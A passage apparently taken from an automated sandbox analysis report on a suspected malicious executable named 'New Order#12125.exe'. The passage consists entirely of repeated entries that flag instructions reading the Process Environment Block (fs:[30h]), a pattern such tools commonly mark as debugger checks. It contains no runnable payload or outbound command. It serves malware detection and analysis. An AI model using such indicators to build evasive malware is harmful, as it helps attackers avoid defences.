              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AA118 mov ecx, dword ptr fs:[00000030h]0_2_015AA118
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AA118 mov eax, dword ptr fs:[00000030h]0_2_015AA118
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AA118 mov eax, dword ptr fs:[00000030h]0_2_015AA118
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AA118 mov eax, dword ptr fs:[00000030h]0_2_015AA118
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C0115 mov eax, dword ptr fs:[00000030h]0_2_015C0115
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AE10E mov eax, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AE10E mov ecx, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AE10E mov eax, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AE10E mov eax, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AE10E mov ecx, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AE10E mov eax, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AE10E mov eax, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AE10E mov ecx, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AE10E mov eax, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AE10E mov ecx, dword ptr fs:[00000030h]0_2_015AE10E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01530124 mov eax, dword ptr fs:[00000030h]0_2_01530124
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E1D0 mov eax, dword ptr fs:[00000030h]0_2_0157E1D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E1D0 mov eax, dword ptr fs:[00000030h]0_2_0157E1D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E1D0 mov ecx, dword ptr fs:[00000030h]0_2_0157E1D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E1D0 mov eax, dword ptr fs:[00000030h]0_2_0157E1D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0157E1D0 mov eax, dword ptr fs:[00000030h]0_2_0157E1D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C61C3 mov eax, dword ptr fs:[00000030h]0_2_015C61C3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C61C3 mov eax, dword ptr fs:[00000030h]0_2_015C61C3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015301F8 mov eax, dword ptr fs:[00000030h]0_2_015301F8
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D61E5 mov eax, dword ptr fs:[00000030h]0_2_015D61E5
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158019F mov eax, dword ptr fs:[00000030h]0_2_0158019F
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158019F mov eax, dword ptr fs:[00000030h]0_2_0158019F
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158019F mov eax, dword ptr fs:[00000030h]0_2_0158019F
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158019F mov eax, dword ptr fs:[00000030h]0_2_0158019F
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01540185 mov eax, dword ptr fs:[00000030h]0_2_01540185
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015BC188 mov eax, dword ptr fs:[00000030h]0_2_015BC188
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015BC188 mov eax, dword ptr fs:[00000030h]0_2_015BC188
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FA197 mov eax, dword ptr fs:[00000030h]0_2_014FA197
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FA197 mov eax, dword ptr fs:[00000030h]0_2_014FA197
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FA197 mov eax, dword ptr fs:[00000030h]0_2_014FA197
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A4180 mov eax, dword ptr fs:[00000030h]0_2_015A4180
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A4180 mov eax, dword ptr fs:[00000030h]0_2_015A4180
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01502050 mov eax, dword ptr fs:[00000030h]0_2_01502050
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01586050 mov eax, dword ptr fs:[00000030h]0_2_01586050
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152C073 mov eax, dword ptr fs:[00000030h]0_2_0152C073
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151E016 mov eax, dword ptr fs:[00000030h]0_2_0151E016
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151E016 mov eax, dword ptr fs:[00000030h]0_2_0151E016
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151E016 mov eax, dword ptr fs:[00000030h]0_2_0151E016
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151E016 mov eax, dword ptr fs:[00000030h]0_2_0151E016
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01584000 mov ecx, dword ptr fs:[00000030h]0_2_01584000
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A2000 mov eax, dword ptr fs:[00000030h]0_2_015A2000
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A2000 mov eax, dword ptr fs:[00000030h]0_2_015A2000
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A2000 mov eax, dword ptr fs:[00000030h]0_2_015A2000
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A2000 mov eax, dword ptr fs:[00000030h]0_2_015A2000
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A2000 mov eax, dword ptr fs:[00000030h]0_2_015A2000
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A2000 mov eax, dword ptr fs:[00000030h]0_2_015A2000
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A2000 mov eax, dword ptr fs:[00000030h]0_2_015A2000
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A2000 mov eax, dword ptr fs:[00000030h]0_2_015A2000
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01596030 mov eax, dword ptr fs:[00000030h]0_2_01596030
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FA020 mov eax, dword ptr fs:[00000030h]0_2_014FA020
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FC020 mov eax, dword ptr fs:[00000030h]0_2_014FC020
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015820DE mov eax, dword ptr fs:[00000030h]0_2_015820DE
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015420F0 mov ecx, dword ptr fs:[00000030h]0_2_015420F0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FA0E3 mov ecx, dword ptr fs:[00000030h]0_2_014FA0E3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015860E0 mov eax, dword ptr fs:[00000030h]0_2_015860E0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015080E9 mov eax, dword ptr fs:[00000030h]0_2_015080E9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FC0F0 mov eax, dword ptr fs:[00000030h]0_2_014FC0F0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150208A mov eax, dword ptr fs:[00000030h]0_2_0150208A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C60B8 mov eax, dword ptr fs:[00000030h]0_2_015C60B8
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015C60B8 mov ecx, dword ptr fs:[00000030h]0_2_015C60B8
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014F80A0 mov eax, dword ptr fs:[00000030h]0_2_014F80A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015980A8 mov eax, dword ptr fs:[00000030h]0_2_015980A8
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158035C mov eax, dword ptr fs:[00000030h]0_2_0158035C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158035C mov eax, dword ptr fs:[00000030h]0_2_0158035C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158035C mov eax, dword ptr fs:[00000030h]0_2_0158035C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158035C mov ecx, dword ptr fs:[00000030h]0_2_0158035C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158035C mov eax, dword ptr fs:[00000030h]0_2_0158035C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0158035C mov eax, dword ptr fs:[00000030h]0_2_0158035C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A8350 mov ecx, dword ptr fs:[00000030h]0_2_015A8350
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015CA352 mov eax, dword ptr fs:[00000030h]0_2_015CA352
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01582349 mov eax, dword ptr fs:[00000030h]0_2_01582349
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D634F mov eax, dword ptr fs:[00000030h]0_2_015D634F
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A437C mov eax, dword ptr fs:[00000030h]0_2_015A437C
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01520310 mov ecx, dword ptr fs:[00000030h]0_2_01520310
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A30B mov eax, dword ptr fs:[00000030h]0_2_0153A30B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A30B mov eax, dword ptr fs:[00000030h]0_2_0153A30B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A30B mov eax, dword ptr fs:[00000030h]0_2_0153A30B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FC310 mov ecx, dword ptr fs:[00000030h]0_2_014FC310
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D8324 mov eax, dword ptr fs:[00000030h]0_2_015D8324
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D8324 mov ecx, dword ptr fs:[00000030h]0_2_015D8324
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D8324 mov eax, dword ptr fs:[00000030h]0_2_015D8324
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D8324 mov eax, dword ptr fs:[00000030h]0_2_015D8324
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AE3DB mov eax, dword ptr fs:[00000030h]0_2_015AE3DB
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AE3DB mov eax, dword ptr fs:[00000030h]0_2_015AE3DB
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AE3DB mov ecx, dword ptr fs:[00000030h]0_2_015AE3DB
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015AE3DB mov eax, dword ptr fs:[00000030h]0_2_015AE3DB
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A43D4 mov eax, dword ptr fs:[00000030h]0_2_015A43D4
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015A43D4 mov eax, dword ptr fs:[00000030h]0_2_015A43D4
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A3C0 mov eax, dword ptr fs:[00000030h]0_2_0150A3C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015083C0 mov eax, dword ptr fs:[00000030h]0_2_015083C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015083C0 mov eax, dword ptr fs:[00000030h]0_2_015083C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015083C0 mov eax, dword ptr fs:[00000030h]0_2_015083C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015083C0 mov eax, dword ptr fs:[00000030h]0_2_015083C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015BC3CD mov eax, dword ptr fs:[00000030h]0_2_015BC3CD
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015863C0 mov eax, dword ptr fs:[00000030h]0_2_015863C0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151E3F0 mov eax, dword ptr fs:[00000030h]0_2_0151E3F0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151E3F0 mov eax, dword ptr fs:[00000030h]0_2_0151E3F0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0151E3F0 mov eax, dword ptr fs:[00000030h]0_2_0151E3F0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015363FF mov eax, dword ptr fs:[00000030h]0_2_015363FF
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015103E9 mov eax, dword ptr fs:[00000030h]0_2_015103E9
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FE388 mov eax, dword ptr fs:[00000030h]0_2_014FE388
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FE388 mov eax, dword ptr fs:[00000030h]0_2_014FE388
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FE388 mov eax, dword ptr fs:[00000030h]0_2_014FE388
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014F8397 mov eax, dword ptr fs:[00000030h]0_2_014F8397
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014F8397 mov eax, dword ptr fs:[00000030h]0_2_014F8397
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014F8397 mov eax, dword ptr fs:[00000030h]0_2_014F8397
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152438F mov eax, dword ptr fs:[00000030h]0_2_0152438F
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152438F mov eax, dword ptr fs:[00000030h]0_2_0152438F
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D625D mov eax, dword ptr fs:[00000030h]0_2_015D625D
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01506259 mov eax, dword ptr fs:[00000030h]0_2_01506259
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015BA250 mov eax, dword ptr fs:[00000030h]0_2_015BA250
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015BA250 mov eax, dword ptr fs:[00000030h]0_2_015BA250
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01588243 mov eax, dword ptr fs:[00000030h]0_2_01588243
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01588243 mov ecx, dword ptr fs:[00000030h]0_2_01588243
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014FA250 mov eax, dword ptr fs:[00000030h]0_2_014FA250
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014F826B mov eax, dword ptr fs:[00000030h]0_2_014F826B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015B0274 mov eax, dword ptr fs:[00000030h]0_2_015B0274
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01504260 mov eax, dword ptr fs:[00000030h]0_2_01504260
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01504260 mov eax, dword ptr fs:[00000030h]0_2_01504260
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01504260 mov eax, dword ptr fs:[00000030h]0_2_01504260
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_014F823B mov eax, dword ptr fs:[00000030h]0_2_014F823B
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D62D6 mov eax, dword ptr fs:[00000030h]0_2_015D62D6
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A2C3 mov eax, dword ptr fs:[00000030h]0_2_0150A2C3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A2C3 mov eax, dword ptr fs:[00000030h]0_2_0150A2C3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A2C3 mov eax, dword ptr fs:[00000030h]0_2_0150A2C3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A2C3 mov eax, dword ptr fs:[00000030h]0_2_0150A2C3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0150A2C3 mov eax, dword ptr fs:[00000030h]0_2_0150A2C3
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015102E1 mov eax, dword ptr fs:[00000030h]0_2_015102E1
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015102E1 mov eax, dword ptr fs:[00000030h]0_2_015102E1
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015102E1 mov eax, dword ptr fs:[00000030h]0_2_015102E1
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E284 mov eax, dword ptr fs:[00000030h]0_2_0153E284
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E284 mov eax, dword ptr fs:[00000030h]0_2_0153E284
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01580283 mov eax, dword ptr fs:[00000030h]0_2_01580283
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01580283 mov eax, dword ptr fs:[00000030h]0_2_01580283
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01580283 mov eax, dword ptr fs:[00000030h]0_2_01580283
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015102A0 mov eax, dword ptr fs:[00000030h]0_2_015102A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015102A0 mov eax, dword ptr fs:[00000030h]0_2_015102A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015962A0 mov eax, dword ptr fs:[00000030h]0_2_015962A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015962A0 mov ecx, dword ptr fs:[00000030h]0_2_015962A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015962A0 mov eax, dword ptr fs:[00000030h]0_2_015962A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015962A0 mov eax, dword ptr fs:[00000030h]0_2_015962A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015962A0 mov eax, dword ptr fs:[00000030h]0_2_015962A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015962A0 mov eax, dword ptr fs:[00000030h]0_2_015962A0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01508550 mov eax, dword ptr fs:[00000030h]0_2_01508550
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01508550 mov eax, dword ptr fs:[00000030h]0_2_01508550
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153656A mov eax, dword ptr fs:[00000030h]0_2_0153656A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153656A mov eax, dword ptr fs:[00000030h]0_2_0153656A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153656A mov eax, dword ptr fs:[00000030h]0_2_0153656A
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01596500 mov eax, dword ptr fs:[00000030h]0_2_01596500
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D4500 mov eax, dword ptr fs:[00000030h]0_2_015D4500
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D4500 mov eax, dword ptr fs:[00000030h]0_2_015D4500
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D4500 mov eax, dword ptr fs:[00000030h]0_2_015D4500
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D4500 mov eax, dword ptr fs:[00000030h]0_2_015D4500
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D4500 mov eax, dword ptr fs:[00000030h]0_2_015D4500
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D4500 mov eax, dword ptr fs:[00000030h]0_2_015D4500
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015D4500 mov eax, dword ptr fs:[00000030h]0_2_015D4500
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510535 mov eax, dword ptr fs:[00000030h]0_2_01510535
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510535 mov eax, dword ptr fs:[00000030h]0_2_01510535
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510535 mov eax, dword ptr fs:[00000030h]0_2_01510535
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510535 mov eax, dword ptr fs:[00000030h]0_2_01510535
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510535 mov eax, dword ptr fs:[00000030h]0_2_01510535
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_01510535 mov eax, dword ptr fs:[00000030h]0_2_01510535
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E53E mov eax, dword ptr fs:[00000030h]0_2_0152E53E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E53E mov eax, dword ptr fs:[00000030h]0_2_0152E53E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E53E mov eax, dword ptr fs:[00000030h]0_2_0152E53E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E53E mov eax, dword ptr fs:[00000030h]0_2_0152E53E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E53E mov eax, dword ptr fs:[00000030h]0_2_0152E53E
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015065D0 mov eax, dword ptr fs:[00000030h]0_2_015065D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A5D0 mov eax, dword ptr fs:[00000030h]0_2_0153A5D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153A5D0 mov eax, dword ptr fs:[00000030h]0_2_0153A5D0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E5CF mov eax, dword ptr fs:[00000030h]0_2_0153E5CF
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0153E5CF mov eax, dword ptr fs:[00000030h]0_2_0153E5CF
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_015025E0 mov eax, dword ptr fs:[00000030h]0_2_015025E0
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
              Source: C:\Users\user\Desktop\New Order#12125.exeCode function: 0_2_0152E5E7 mov eax, dword ptr fs:[00000030h]0_2_0152E5E7
